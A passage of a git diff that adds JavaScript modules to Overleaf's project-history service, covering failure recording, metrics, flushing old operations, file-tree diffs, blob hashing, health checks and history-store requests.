content.split('\n'), + source: 'restore', + user_id: userId, + undoing: true, + }, + }, + function (error, res, body) { + if (error != null) { + return callback(OError.tag(error)) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + return callback(null) + } else { + error = new OError( + `doc updater returned a non-success status code: ${res.statusCode}`, + { project_id: projectId, doc_id: docId, url } + ) + return callback(error) + } + } + ) +} diff --git a/services/project-history/app/js/ErrorRecorder.js b/services/project-history/app/js/ErrorRecorder.js new file mode 100644 index 0000000..648b53f --- /dev/null +++ b/services/project-history/app/js/ErrorRecorder.js @@ -0,0 +1,267 @@ +// @ts-check + +import { callbackify } from 'node:util' +import logger from '@overleaf/logger' +import metrics from '@overleaf/metrics' +import OError from '@overleaf/o-error' +import { db } from './mongodb.js' + +/** + * @import { ProjectHistoryFailure } from './mongo-types' + */ + +/** + * @param {string} projectId + * @param {number} queueSize + * @param {Error} error + * @return {Promise<ProjectHistoryFailure>} the failure record + */ +async function record(projectId, queueSize, error) { + const errorRecord = { + queueSize, + error: error.toString(), + stack: error.stack ?? '', + ts: new Date(), + } + logger.debug( + { projectId, errorRecord }, + 'recording failed attempt to process updates' + ) + const result = await db.projectHistoryFailures.findOneAndUpdate( + { project_id: projectId }, + { + $set: errorRecord, + $inc: { attempts: 1 }, + $push: { + history: { + $each: [errorRecord], + $position: 0, + // only keep recent failures + $slice: 10, + }, + }, + }, + { upsert: true, returnDocument: 'after', includeResultMetadata: true } + ) + if (result.value == null) { + // Since we upsert, the result should always have a value + throw new OError('no value returned when recording an error', { projectId }) + } + return result.value +} + +async function clearError(projectId) { + await db.projectHistoryFailures.deleteOne({ project_id: projectId }) +} + +async function setForceDebug(projectId, state) { + if (state == null) { + state = true + } + logger.debug({ projectId, state }, 'setting forceDebug state for project') + await db.projectHistoryFailures.updateOne( + { project_id: projectId }, + { $set: { forceDebug: state } }, + { upsert: true } + ) +} + +// we only record the sync start time, and not the end time, because the +// record should be cleared on success. +async function recordSyncStart(projectId) { + await db.projectHistoryFailures.updateOne( + { project_id: projectId }, + { + $currentDate: { resyncStartedAt: true }, + $inc: { resyncAttempts: 1 }, + $push: { + history: { + $each: [{ resyncStartedAt: new Date() }], + $position: 0, + $slice: 10, + }, + }, + }, + { upsert: true } + ) +} + +/** + * @param projectId + */ +async function getFailureRecord(projectId) { + return await db.projectHistoryFailures.findOne({ project_id: projectId }) +} + +async function getLastFailure(projectId) { + const result = await db.projectHistoryFailures.findOneAndUpdate( + { project_id: projectId }, + { $inc: { requestCount: 1 } }, // increment the request count every time we check the last failure + { projection: { error: 1, ts: 1 } } + ) + return result && result.value +} + +async function getFailedProjects() { + return await db.projectHistoryFailures.find({}).toArray() +} + +async function getFailuresByType() { + const results = await db.projectHistoryFailures.find({}).toArray() + const failureCounts = {} + const failureAttempts = {} + const failureRequests = {} + const maxQueueSize = {} + // count all the failures and number of attempts by type + for (const result of results || []) { + const failureType = result.error + const attempts = result.attempts || 1 // allow for field to be absent + const requests = result.requestCount || 0 + const queueSize = result.queueSize || 0 + if (failureCounts[failureType] > 0) { + failureCounts[failureType]++ + failureAttempts[failureType] += attempts + failureRequests[failureType] += requests + maxQueueSize[failureType] = Math.max(queueSize, maxQueueSize[failureType]) + } else { + failureCounts[failureType] = 1 + failureAttempts[failureType] = attempts + failureRequests[failureType] = requests + maxQueueSize[failureType] = queueSize + } + } + + return { failureCounts, failureAttempts, failureRequests, maxQueueSize } +} + +async function getFailures() { + const { failureCounts, failureAttempts, failureRequests, maxQueueSize } = + await getFailuresByType() + + let attempts, failureType, label, requests + const shortNames = { + 'Error: bad response from filestore: 404': 'filestore-404', + 'Error: bad response from filestore: 500': 'filestore-500', + 'NotFoundError: got a 404 from web api': 'web-api-404', + 'OError: history store a non-success status code: 413': 'history-store-413', + 'OError: history store a non-success status code: 422': 'history-store-422', + 'OError: history store a non-success status code: 500': 'history-store-500', + 'OError: history store a non-success status code: 503': 'history-store-503', + 'Error: history store a non-success status code: 413': 'history-store-413', + 'Error: history store a non-success status code: 422': 'history-store-422', + 'Error: history store a non-success status code: 500': 'history-store-500', + 'Error: history store a non-success status code: 503': 'history-store-503', + 'Error: web returned a non-success status code: 500 (attempts: 2)': + 'web-500', + 'Error: ESOCKETTIMEDOUT': 'socket-timeout', + 'Error: no project found': 'no-project-found', + 'OpsOutOfOrderError: project structure version out of order on incoming updates': + 'incoming-project-version-out-of-order', + 'OpsOutOfOrderError: doc version out of order on incoming updates': + 'incoming-doc-version-out-of-order', + 'OpsOutOfOrderError: project structure version out of order': + 'chunk-project-version-out-of-order', + 'OpsOutOfOrderError: doc version out of order': + 'chunk-doc-version-out-of-order', + 'Error: failed to extend lock': 'lock-overrun', + 'Error: tried to release timed out lock': 'lock-overrun', + 'Error: Timeout': 'lock-overrun', + 'Error: sync ongoing': 'sync-ongoing', + 'SyncError: unexpected resyncProjectStructure update': 'sync-error', + '[object Error]': 'unknown-error-object', + 'UpdateWithUnknownFormatError: update with unknown format': + 'unknown-format', + 'Error: update with unknown format': 'unknown-format', + 'TextOperationError: The base length of the second operation has to be the target length of the first operation': + 'text-op-error', + 'Error: ENOSPC: no space left on device, write': 'ENOSPC', + '*': 'other', + } + + // set all the known errors to zero if not present (otherwise gauges stay on their last value) + const summaryCounts = {} + const summaryAttempts = {} + const summaryRequests = {} + const summaryMaxQueueSize = {} + + for (failureType in shortNames) { + label = shortNames[failureType] + summaryCounts[label] = 0 + summaryAttempts[label] = 0 + summaryRequests[label] = 0 + summaryMaxQueueSize[label] = 0 + } + + // record a metric for each type of failure + for (failureType in failureCounts) { + const failureCount = failureCounts[failureType] + label = shortNames[failureType] || shortNames['*'] + summaryCounts[label] += failureCount + summaryAttempts[label] += failureAttempts[failureType] + summaryRequests[label] += failureRequests[failureType] + summaryMaxQueueSize[label] = Math.max( + maxQueueSize[failureType], + summaryMaxQueueSize[label] + ) + } + + for (label in summaryCounts) { + const count = summaryCounts[label] + metrics.globalGauge('failed', count, 1, { status: label }) + } + + for (label in summaryAttempts) { + attempts = summaryAttempts[label] + metrics.globalGauge('attempts', attempts, 1, { status: label }) + } + + for (label in summaryRequests) { + requests = summaryRequests[label] + metrics.globalGauge('requests', requests, 1, { status: label }) + } + + for (label in summaryMaxQueueSize) { + const queueSize = summaryMaxQueueSize[label] + metrics.globalGauge('max-queue-size', queueSize, 1, { status: label }) + } + + return { + counts: summaryCounts, + attempts: summaryAttempts, + requests: summaryRequests, + maxQueueSize: summaryMaxQueueSize, + } +} + +// EXPORTS + +const getFailedProjectsCb = callbackify(getFailedProjects) +const getFailureRecordCb = callbackify(getFailureRecord) +const getFailuresCb = callbackify(getFailures) +const getLastFailureCb = callbackify(getLastFailure) +const recordCb = callbackify(record) +const clearErrorCb = callbackify(clearError) +const recordSyncStartCb = callbackify(recordSyncStart) +const setForceDebugCb = callbackify(setForceDebug) + +export { + getFailedProjectsCb as getFailedProjects, + getFailureRecordCb as getFailureRecord, + getLastFailureCb as getLastFailure, + getFailuresCb as getFailures, + recordCb as record, + clearErrorCb as clearError, + recordSyncStartCb as recordSyncStart, + setForceDebugCb as setForceDebug, +} + +export const promises = { + getFailedProjects, + getFailureRecord, + getLastFailure, + getFailures, + record, + clearError, + recordSyncStart, + setForceDebug, +} diff --git a/services/project-history/app/js/Errors.js b/services/project-history/app/js/Errors.js new file mode 100644 index 0000000..0b8d24b --- /dev/null +++ b/services/project-history/app/js/Errors.js @@ -0,0 +1,11 @@ +import OError from '@overleaf/o-error' + +export class NotFoundError extends OError {} +export class BadRequestError extends OError {} +export class SyncError extends OError {} +export class OpsOutOfOrderError extends OError {} +export class InconsistentChunkError extends OError {} +export class UpdateWithUnknownFormatError extends OError {} +export class UnexpectedOpTypeError extends OError {} +export class TooManyRequestsError extends OError {} +export class NeedFullProjectStructureResyncError extends OError {} diff --git a/services/project-history/app/js/FileTreeDiffGenerator.js b/services/project-history/app/js/FileTreeDiffGenerator.js new file mode 100644 index 0000000..16696c6 --- /dev/null +++ b/services/project-history/app/js/FileTreeDiffGenerator.js @@ -0,0 +1,129 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import Core from 'overleaf-editor-core' +import logger from '@overleaf/logger' +import * as Errors from './Errors.js' + +const { MoveFileOperation, AddFileOperation, EditFileOperation } = Core + +export function buildDiff(chunk, fromVersion, toVersion) { + chunk = Core.Chunk.fromRaw(chunk.chunk) + const chunkStartVersion = chunk.getStartVersion() + + const diff = _getInitialDiffSnapshot(chunk, fromVersion) + + const changes = chunk + .getChanges() + .slice(fromVersion - chunkStartVersion, toVersion - chunkStartVersion) + for (let i = 0; i < changes.length; i++) { + const change = changes[i] + for (const operation of Array.from(change.getOperations())) { + if (operation.pathname === null || operation.pathname === '') { + // skip operations for missing files + logger.warn({ diff, operation }, 'invalid pathname in operation') + } else if (operation instanceof EditFileOperation) { + _applyEditFileToDiff(diff, operation) + } else if (operation instanceof AddFileOperation) { + _applyAddFileToDiff(diff, operation) + } else if (operation instanceof MoveFileOperation) { + if (operation.isRemoveFile()) { + const deletedAtV = fromVersion + i + _applyDeleteFileToDiff(diff, operation, deletedAtV) + } else { + _applyMoveFileToDiff(diff, operation) + } + } + } + } + + return Object.values(diff) +} + +function _getInitialDiffSnapshot(chunk, fromVersion) { + // Start with a 'diff' which is snapshot of the filetree at the beginning, + // with nothing in the diff marked as changed. + // Use a bare object to protect against reserved names. + const diff = Object.create(null) + const files = _getInitialFiles(chunk, fromVersion) + for (const [pathname, file] of Object.entries(files)) { + diff[pathname] = { pathname, editable: file.isEditable() } + } + return diff +} + +function _getInitialFiles(chunk, fromVersion) { + const snapshot = chunk.getSnapshot() + const changes = chunk + .getChanges() + .slice(0, fromVersion - chunk.getStartVersion()) + snapshot.applyAll(changes) + return snapshot.fileMap.files +} + +function _applyAddFileToDiff(diff, operation) { + return (diff[operation.pathname] = { + pathname: operation.pathname, + operation: 'added', + editable: operation.file.isEditable(), + }) +} + +function _applyEditFileToDiff(diff, operation) { + const change = diff[operation.pathname] + if ((change != null ? change.operation : undefined) == null) { + // avoid exception for non-existent change + return (diff[operation.pathname] = { + pathname: operation.pathname, + operation: 'edited', + }) + } +} + +function _applyMoveFileToDiff(diff, operation) { + if ( + diff[operation.newPathname] != null && + diff[operation.newPathname].operation !== 'removed' + ) { + const err = new Errors.InconsistentChunkError( + 'trying to move to file that already exists', + { diff, operation } + ) + throw err + } + const change = diff[operation.pathname] + if (change == null) { + logger.warn({ diff, operation }, 'tried to rename non-existent file') + return + } + change.newPathname = operation.newPathname + if (change.operation === 'added') { + // If this file was added this time, just leave it as an add, but + // at the new name. + change.pathname = operation.newPathname + delete change.newPathname + } else { + change.operation = 'renamed' + } + diff[operation.newPathname] = change + return delete diff[operation.pathname] +} + +function _applyDeleteFileToDiff(diff, operation, deletedAtV) { + // avoid exception for non-existent change + if (diff[operation.pathname] != null) { + diff[operation.pathname].operation = 'removed' + } + return diff[operation.pathname] != null + ? (diff[operation.pathname].deletedAtV = deletedAtV) + : undefined +} diff --git a/services/project-history/app/js/FlushManager.js b/services/project-history/app/js/FlushManager.js new file mode 100644 index 0000000..6df3b20 --- /dev/null +++ b/services/project-history/app/js/FlushManager.js @@ -0,0 +1,142 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import async from 'async' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import metrics from '@overleaf/metrics' +import _ from 'lodash' +import * as RedisManager from './RedisManager.js' +import * as UpdatesProcessor from './UpdatesProcessor.js' +import * as ErrorRecorder from './ErrorRecorder.js' + +export function flushIfOld(projectId, cutoffTime, callback) { + if (callback == null) { + callback = function () {} + } + return RedisManager.getFirstOpTimestamp( + projectId, + function (err, firstOpTimestamp) { + if (err != null) { + return callback(OError.tag(err)) + } + // In the normal case, the flush marker will be set with the + // timestamp of the oldest operation in the queue by docupdater. + // If the marker is not set for any reason, we flush it anyway + // for safety. + if (!firstOpTimestamp || firstOpTimestamp < cutoffTime) { + logger.debug( + { projectId, firstOpTimestamp, cutoffTime }, + 'flushing old project' + ) + metrics.inc('flush-old-updates', 1, { status: 'flushed' }) + return UpdatesProcessor.processUpdatesForProject(projectId, callback) + } else { + metrics.inc('flush-old-updates', 1, { status: 'skipped' }) + return callback() + } + } + ) +} + +export function flushOldOps(options, callback) { + if (callback == null) { + callback = function () {} + } + logger.debug({ options }, 'starting flush of old ops') + // allow running flush in background for cron jobs + if (options.background) { + // return immediate response to client, then discard callback + callback(null, { message: 'running flush in background' }) + callback = function () {} + } + return RedisManager.getProjectIdsWithHistoryOps( + null, + function (error, projectIds) { + if (error != null) { + return callback(OError.tag(error)) + } + return ErrorRecorder.getFailedProjects( + function (error, projectHistoryFailures) { + if (error != null) { + return callback(OError.tag(error)) + } + // exclude failed projects already in projectHistoryFailures + const failedProjects = new Set() + for (const entry of Array.from(projectHistoryFailures)) { + failedProjects.add(entry.project_id) + } + // randomise order so we get different projects if there is a limit + projectIds = _.shuffle(projectIds) + const maxAge = options.maxAge || 6 * 3600 // default to 6 hours + const cutoffTime = new Date(Date.now() - maxAge * 1000) + const startTime = new Date() + let count = 0 + const jobs = projectIds.map( + projectId => + function (cb) { + const timeTaken = new Date() - startTime + count++ + if ( + (options != null ? options.timeout : undefined) && + timeTaken > options.timeout + ) { + // finish early due to timeout, return an error to bail out of the async iteration + logger.debug('background retries timed out') + return cb(new OError('retries timed out')) + } + if ( + (options != null ? options.limit : undefined) && + count > options.limit + ) { + // finish early due to reaching limit, return an error to bail out of the async iteration + logger.debug({ count }, 'background retries hit limit') + return cb(new OError('hit limit')) + } + if (failedProjects.has(projectId)) { + // skip failed projects + return setTimeout(cb, options.queueDelay || 100) // pause between flushes + } + return flushIfOld(projectId, cutoffTime, function (err) { + if (err != null) { + logger.warn( + { projectId, err }, + 'error flushing old project' + ) + } + return setTimeout(cb, options.queueDelay || 100) + }) + } + ) // pause between flushes + return async.series( + async.reflectAll(jobs), + function (error, results) { + const success = [] + const failure = [] + results.forEach((result, i) => { + if ( + result.error != null && + !['retries timed out', 'hit limit'].includes( + result?.error?.message + ) + ) { + // ignore expected errors + return failure.push(projectIds[i]) + } else { + return success.push(projectIds[i]) + } + }) + return callback(error, { success, failure, failedProjects }) + } + ) + } + ) + } + ) +} diff --git a/services/project-history/app/js/HashManager.js b/services/project-history/app/js/HashManager.js new file mode 100644 index 0000000..91e77ba --- /dev/null +++ b/services/project-history/app/js/HashManager.js @@ -0,0 +1,58 @@ +/* eslint-disable + no-undef, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import { promisify } from 'node:util' +import fs from 'node:fs' +import crypto from 'node:crypto' +import OError from '@overleaf/o-error' +import { pipeline } from 'node:stream' + +export function _getBlobHashFromString(string) { + const byteLength = Buffer.byteLength(string) + const hash = crypto.createHash('sha1') + hash.setEncoding('hex') + hash.update('blob ' + byteLength + '\x00') + hash.update(string, 'utf8') + hash.end() + return hash.read() +} + +export function _getBlobHash(fsPath, callback) { + return fs.stat(fsPath, function (err, stats) { + if (err != null) { + OError.tag(err, 'failed to stat file in _getBlobHash', { fsPath }) + return callback(err) + } + const byteLength = stats.size + const hash = crypto.createHash('sha1') + hash.setEncoding('hex') + hash.update('blob ' + byteLength + '\x00') + + pipeline(fs.createReadStream(fsPath), hash, err => { + if (err) { + callback( + OError.tag(err, 'error streaming file from disk', { + fsPath, + byteLength, + }) + ) + } else { + hash.end() + callback(null, hash.read(), byteLength) + } + }) + }) +} + +export const promises = { + _getBlobHash: promisify(_getBlobHash), +} diff --git a/services/project-history/app/js/HealthChecker.js b/services/project-history/app/js/HealthChecker.js new file mode 100644 index 0000000..c57f184 --- /dev/null +++ b/services/project-history/app/js/HealthChecker.js @@ -0,0 +1,78 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import { ObjectId } from './mongodb.js' +import request from 'request' +import async from 'async' +import settings from '@overleaf/settings' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import * as LockManager from './LockManager.js' + +const { port } = settings.internal.history + +export function check(callback) { + const projectId = new ObjectId(settings.history.healthCheck.project_id) + const url = `http://127.0.0.1:${port}/project/${projectId}` + logger.debug({ projectId }, 'running health check') + const jobs = [ + cb => + request.get( + { url: `http://127.0.0.1:${port}/check_lock`, timeout: 3000 }, + function (err, res, body) { + if (err != null) { + OError.tag(err, 'error checking lock for health check', { + project_id: projectId, + }) + return cb(err) + } else if ((res != null ? res.statusCode : undefined) !== 200) { + return cb(new Error(`status code not 200, it's ${res.statusCode}`)) + } else { + return cb() + } + } + ), + cb => + request.post( + { url: `${url}/flush`, timeout: 10000 }, + function (err, res, body) { + if (err != null) { + OError.tag(err, 'error flushing for health check', { + project_id: projectId, + }) + return cb(err) + } else if ((res != null ? res.statusCode : undefined) !== 204) { + return cb(new Error(`status code not 204, it's ${res.statusCode}`)) + } else { + return cb() + } + } + ), + cb => + request.get( + { url: `${url}/updates`, timeout: 10000 }, + function (err, res, body) { + if (err != null) { + OError.tag(err, 'error getting updates for health check', { + project_id: projectId, + }) + return cb(err) + } else if ((res != null ? res.statusCode : undefined) !== 200) { + return cb(new Error(`status code not 200, it's ${res.statusCode}`)) + } else { + return cb() + } + } + ), + ] + return async.series(jobs, callback) +} + +export function checkLock(callback) { + return LockManager.healthCheck(callback) +} diff --git a/services/project-history/app/js/HistoryApiManager.js b/services/project-history/app/js/HistoryApiManager.js new file mode 100644 index 0000000..226ce10 --- /dev/null +++ b/services/project-history/app/js/HistoryApiManager.js @@ -0,0 +1,22 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import * as WebApiManager from './WebApiManager.js' +import logger from '@overleaf/logger' + +export function shouldUseProjectHistory(projectId, callback) { + if (callback == null) { + callback = function () {} + } + return WebApiManager.getHistoryId(projectId, (error, historyId) => + callback(error, historyId != null) + ) +} diff --git a/services/project-history/app/js/HistoryBlobTranslator.js b/services/project-history/app/js/HistoryBlobTranslator.js new file mode 100644 index 0000000..b0a6d4b --- /dev/null +++ b/services/project-history/app/js/HistoryBlobTranslator.js @@ -0,0 +1,123 @@ +// @ts-check + +import { + Range, + TrackedChange, + TrackedChangeList, + CommentList, + Comment, + TrackingProps, +} from 'overleaf-editor-core' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' + +/** + * @import { AddDocUpdate } from './types' + * @import { CommentRawData, TrackedChangeRawData } from 'overleaf-editor-core/lib/types' + */ + +/** + * + * @param {AddDocUpdate} update + * @returns {{trackedChanges: TrackedChangeRawData[], comments: CommentRawData[]} | undefined} + */ +export function createRangeBlobDataFromUpdate(update) { + logger.debug({ update }, 'createBlobDataFromUpdate') + + if (update.doc == null || update.docLines == null) { + throw new OError('Not an AddFileUpdate') + } + if ( + !update.ranges || + (update.ranges.changes == null && update.ranges.comments == null) + ) { + return undefined + } + + if ( + (!update.ranges.changes || update.ranges.changes.length === 0) && + (!update.ranges.comments || update.ranges.comments.length === 0) + ) { + return undefined + } + + const sortedRanges = [...(update.ranges.changes || [])].sort((a, b) => { + if (a.op.p !== b.op.p) { + return a.op.p - b.op.p + } + if ('i' in a.op && a.op.i != null && 'd' in b.op && b.op.d != null) { + // Move deletes before inserts + return 1 + } + return -1 + }) + + const tcList = new TrackedChangeList([]) + + for (const change of sortedRanges) { + if ('d' in change.op && change.op.d != null) { + const length = change.op.d.length + const range = new Range(change.op.hpos ?? change.op.p, length) + tcList.add( + new TrackedChange( + range, + new TrackingProps( + 'delete', + change.metadata.user_id, + new Date(change.metadata.ts) + ) + ) + ) + } else if ('i' in change.op && change.op.i != null) { + const length = change.op.i.length + const range = new Range(change.op.hpos ?? change.op.p, length) + tcList.add( + new TrackedChange( + range, + new TrackingProps( + 'insert', + change.metadata.user_id, + new Date(change.metadata.ts) + ) + ) + ) + } + } + const comments = [...(update.ranges.comments || [])].sort((a, b) => { + return a.op.p - b.op.p + }) + + /** @type {Map<string, {ranges: Range[], resolved: boolean}>} */ + const commentMap = new Map() + for (const comment of comments) { + const id = comment.op.t + if (!commentMap.has(id)) { + commentMap.set(id, { + ranges: [], + resolved: comment.op.resolved ?? false, + }) + } + const entry = commentMap.get(id) + if (!entry) { + throw new Error('Comment entry not found') + } + if (entry.resolved !== (comment.op.resolved ?? false)) { + throw new Error('Mismatching resolved status for comment') + } + + const commentLength = comment.op.c.length + if (commentLength > 0) { + // Empty comments in operations are translated to detached comments + const range = new Range(comment.op.hpos ?? comment.op.p, commentLength) + entry.ranges.push(range) + } + } + const commentList = new CommentList( + [...commentMap.entries()].map( + ([id, commentObj]) => + new Comment(id, commentObj.ranges, commentObj.resolved) + ) + ) + + return { trackedChanges: tcList.toRaw(), comments: commentList.toRaw() } +} diff --git a/services/project-history/app/js/HistoryStoreManager.js b/services/project-history/app/js/HistoryStoreManager.js new file mode 100644 index 0000000..fe9c9e3 --- /dev/null +++ b/services/project-history/app/js/HistoryStoreManager.js @@ -0,0 +1,625 @@ +import { promisify } from 'node:util' +import fs from 'node:fs' +import request from 'request' +import stream from 'node:stream' +import logger from '@overleaf/logger' +import _ from 'lodash' +import { URL } from 'node:url' +import OError from '@overleaf/o-error' +import Settings from '@overleaf/settings' +import { + fetchStream, + fetchNothing, + RequestFailedError, +} from '@overleaf/fetch-utils' +import * as Versions from './Versions.js' +import * as Errors from './Errors.js' +import * as LocalFileWriter from './LocalFileWriter.js' +import * as HashManager from './HashManager.js' +import * as HistoryBlobTranslator from './HistoryBlobTranslator.js' +import { promisifyMultiResult } from '@overleaf/promise-utils' + +const HTTP_REQUEST_TIMEOUT = Settings.overleaf.history.requestTimeout + +/** + * Container for functions that need to be mocked in tests + * + * TODO: Rewrite tests in terms of exported functions only + */ +export const _mocks = {} + +class StringStream extends stream.Readable { + _read() {} +} + +_mocks.getMostRecentChunk = (projectId, historyId, callback) => { + const path = `projects/${historyId}/latest/history` + logger.debug({ projectId, historyId }, 'getting chunk from history service') + _requestChunk({ path, json: true }, callback) +} + +/** + * @param {Callback} callback + */ +export function getMostRecentChunk(projectId, historyId, callback) { + _mocks.getMostRecentChunk(projectId, historyId, callback) +} + +/** + * @param {Callback} callback + */ +export function getChunkAtVersion(projectId, historyId, version, callback) { + const path = `projects/${historyId}/versions/${version}/history` + logger.debug( + { projectId, historyId, version }, + 'getting chunk from history service for version' + ) + _requestChunk({ path, json: true }, callback) +} + +export function getMostRecentVersion(projectId, historyId, callback) { + getMostRecentChunk(projectId, historyId, (error, chunk) => { + if (error) { + return callback(OError.tag(error)) + } + const mostRecentVersion = + chunk.chunk.startVersion + (chunk.chunk.history.changes || []).length + const lastChange = _.last( + _.sortBy(chunk.chunk.history.changes || [], x => x.timestamp) + ) + // find the latest project and doc versions in the chunk + _getLatestProjectVersion(projectId, chunk, (err1, projectVersion) => + _getLatestV2DocVersions(projectId, chunk, (err2, v2DocVersions) => { + // return the project and doc versions + const projectStructureAndDocVersions = { + project: projectVersion, + docs: v2DocVersions, + } + callback( + err1 || err2, + mostRecentVersion, + projectStructureAndDocVersions, + lastChange, + chunk + ) + }) + ) + }) +} + +/** + * @param {string} projectId + * @param {string} historyId + * @param {Object} opts + * @param {boolean} [opts.readOnly] + * @param {(error: Error, rawChunk?: { startVersion: number, endVersion: number, endTimestamp: Date}) => void} callback + */ +export function getMostRecentVersionRaw(projectId, historyId, opts, callback) { + const path = `projects/${historyId}/latest/history/raw` + logger.debug( + { projectId, historyId }, + 'getting raw chunk from history service' + ) + const qs = opts.readOnly ? { readOnly: true } : {} + _requestHistoryService({ path, json: true, qs }, (err, body) => { + if (err) return callback(OError.tag(err)) + const { startVersion, endVersion, endTimestamp } = body + callback(null, { + startVersion, + endVersion, + endTimestamp: new Date(endTimestamp), + }) + }) +} + +function _requestChunk(options, callback) { + _requestHistoryService(options, (err, chunk) => { + if (err) { + return callback(OError.tag(err)) + } + if ( + chunk == null || + chunk.chunk == null || + chunk.chunk.startVersion == null + ) { + const { path } = options + return callback(new OError('unexpected response', { path })) + } + callback(null, chunk) + }) +} + +function _getLatestProjectVersion(projectId, chunk, callback) { + // find the initial project version + const projectVersionInSnapshot = chunk.chunk.history.snapshot?.projectVersion + let projectVersion = projectVersionInSnapshot + const chunkStartVersion = chunk.chunk.startVersion + // keep track of any first error + let error = null + // iterate over the changes in chunk to find the most recent project version + for (const [changeIdx, change] of ( + chunk.chunk.history.changes || [] + ).entries()) { + const projectVersionInChange = change.projectVersion + if (projectVersionInChange != null) { + if ( + projectVersion != null && + Versions.lt(projectVersionInChange, projectVersion) + ) { + if (!error) { + error = new Errors.OpsOutOfOrderError( + 'project structure version out of order', + { + projectId, + chunkStartVersion, + projectVersionInSnapshot, + changeIdx, + projectVersion, + projectVersionInChange, + } + ) + } + } else { + projectVersion = projectVersionInChange + } + } + } + callback(error, projectVersion) +} + +function _getLatestV2DocVersions(projectId, chunk, callback) { + // find the initial doc versions (indexed by docId as this is immutable) + const v2DocVersions = + (chunk.chunk.history.snapshot && + chunk.chunk.history.snapshot.v2DocVersions) || + {} + // keep track of any errors + let error = null + // iterate over the changes in the chunk to find the most recent doc versions + for (const change of chunk.chunk.history.changes || []) { + if (change.v2DocVersions != null) { + for (const docId in change.v2DocVersions) { + const docInfo = change.v2DocVersions[docId] + const { v } = docInfo + if ( + v2DocVersions[docId] && + v2DocVersions[docId].v != null && + Versions.lt(v, v2DocVersions[docId].v) + ) { + if (!error) { + logger.warn( + { + projectId, + docId, + changeVersion: docInfo, + previousVersion: v2DocVersions[docId], + }, + 'doc version out of order in chunk' + ) + error = new Errors.OpsOutOfOrderError('doc version out of order') + } + } else { + v2DocVersions[docId] = docInfo + } + } + } + } + callback(error, v2DocVersions) +} + +export function getProjectBlob(historyId, blobHash, callback) { + logger.debug({ historyId, blobHash }, 'getting blob from history service') + _requestHistoryService( + { path: `projects/${historyId}/blobs/${blobHash}` }, + callback + ) +} + +/** + * @param {Callback} callback + */ +export function getProjectBlobStream(historyId, blobHash, callback) { + const url = `${Settings.overleaf.history.host}/projects/${historyId}/blobs/${blobHash}` + logger.debug( + { historyId, blobHash }, + 'getting blob stream from history service' + ) + fetchStream(url, getHistoryFetchOptions()) + .then(stream => { + callback(null, stream) + }) + .catch(err => callback(OError.tag(err))) +} + +export function sendChanges( + projectId, + historyId, + changes, + endVersion, + callback +) { + logger.debug( + { projectId, historyId, endVersion }, + 'sending changes to history service' + ) + _requestHistoryService( + { + path: `projects/${historyId}/legacy_changes`, + qs: { end_version: endVersion }, + method: 'POST', + json: changes, + }, + error => { + if (error) { + OError.tag(error, 'failed to send changes to v1', { + projectId, + historyId, + endVersion, + errorCode: error.code, + statusCode: error.statusCode, + body: error.body, + }) + return callback(error) + } + callback() + } + ) +} + +function createBlobFromString(historyId, data, fileId, callback) { + const stringStream = new StringStream() + stringStream.push(data) + stringStream.push(null) + LocalFileWriter.bufferOnDisk( + stringStream, + '', + fileId, + (fsPath, cb) => { + _createBlob(historyId, fsPath, cb) + }, + callback + ) +} + +function _checkBlobExists(historyId, hash, callback) { + if (!hash) return callback(null, false) + const url = `${Settings.overleaf.history.host}/projects/${historyId}/blobs/${hash}` + fetchNothing(url, { + method: 'HEAD', + ...getHistoryFetchOptions(), + }) + .then(res => { + callback(null, true) + }) + .catch(err => { + if (err instanceof RequestFailedError && err.response.status === 404) { + return callback(null, false) + } + callback(OError.tag(err), false) + }) +} + +function _rewriteFilestoreUrl(url, projectId, callback) { + if (!url) { + return { fileId: null, filestoreURL: null } + } + // Rewrite the filestore url to point to the location in the local + // settings for this service (this avoids problems with cross- + // datacentre requests when running filestore in multiple locations). + const { pathname: fileStorePath } = new URL(url) + const urlMatch = /^\/project\/([0-9a-f]{24})\/file\/([0-9a-f]{24})$/.exec( + fileStorePath + ) + if (urlMatch == null) { + return callback(new OError('invalid file for blob creation')) + } + if (urlMatch[1] !== projectId) { + return callback(new OError('invalid project for blob creation')) + } + + const fileId = urlMatch[2] + const filestoreURL = `${Settings.apis.filestore.url}/project/${projectId}/file/${fileId}` + return { filestoreURL, fileId } +} + +export function createBlobForUpdate(projectId, historyId, update, callback) { + callback = _.once(callback) + + if (update.doc != null && update.docLines != null) { + let ranges + try { + ranges = HistoryBlobTranslator.createRangeBlobDataFromUpdate(update) + } catch (error) { + return callback(error) + } + createBlobFromString( + historyId, + update.docLines, + `project-${projectId}-doc-${update.doc}`, + (err, fileHash) => { + if (err) { + return callback(err) + } + if (ranges) { + createBlobFromString( + historyId, + JSON.stringify(ranges), + 